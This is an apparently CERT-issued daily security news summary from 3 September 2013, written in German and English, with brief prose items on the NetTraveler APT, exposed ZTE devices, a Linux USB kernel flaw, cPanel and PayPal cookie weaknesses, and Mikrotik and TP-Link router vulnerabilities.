Tageszusammenfassung - Dienstag 3-09-2013

End-of-Shift report

Timeframe: Montag 02-09-2013 18:00 − Dienstag 03-09-2013 18:00 Handler: Robert Waldner Co-Handler: n/a

Blog: NetTraveler Is Back: The Red Star APT Returns With New Tricks

NetTraveler, which we described in depth in a previous post, is an APT that infected hundreds of high profile victims in more than 40 countries. Known targets of NetTraveler (also known as ‘Travnet’ or “Netfile”) include Tibetan/Uyghur activists, oil industry companies, scientific research centers and institutes, universities, private companies, governments and governmental institutions, embassies and military contractors.


353,436 Exposed ZTE Devices Found In Net Census

mask.of.sanity writes "Hundreds of thousands of internet-accessible devices manufactured Chinese telco ZTE have been found with default or hardcoded usernames and passwords. The devices were discovered in analysis of the huge dataset from the Internet Census run this year. ZTE topped the charts, accounting for 28 percent of all affected devices worldwide. Only one manufacturer has responded to the researchers bid to supply the data in efforts to stop production of insecure devices."


USB-Tastatur kapert Linux-Kern

Der Speicher eines Linux-Systems kann durch USB-Endgeräte fast beliebig manipuliert werden, wie ChromeOS-Entwickler Kees Cook entdeckte. Einen Patch für das Problem lieferte er gleich mit.


cPanel Multiple Vulnerabilities

A security issue and multiple vulnerabilities have been reported in cPanel, which can be exploited by malicious, local users to disclose potentially sensitive information, bypass certain security restrictions, manipulate certain data, and gain escalated privileges and by malicious users to conduct script insertion attacks, bypass certain security restrictions, and compromise a vulnerable system.


Bugtraq: PayPals "invalid" aksession Padding Oracle Flaw

The main PayPal web site sets a cookie named "aksession" which contains a blob of base64-encoded ciphertext. This ciphertext is encrypted using a 64-bit block cipher in CBC mode and does not have any other integrity protection. Naturally, this means the aksession cookie is vulnerable to a padding oracle attack allowing full decryption and forgery.


[remote] - Mikrotik RouterOS sshd (ROSSSH) - Remote Preauth Heap Corruption

During an audit the Mikrotik RouterOS sshd (ROSSSH) has been identified to have a remote previous to authentication heap corruption in its sshd component. Exploitation of this vulnerability will allow full access to the router device.


[webapps] - TP-Link TD-W8951ND - Multiple Vulnerabilities

Tested on TP-Link TD-W8951ND Firmware 4.0.0 Build 120607 Rel.30923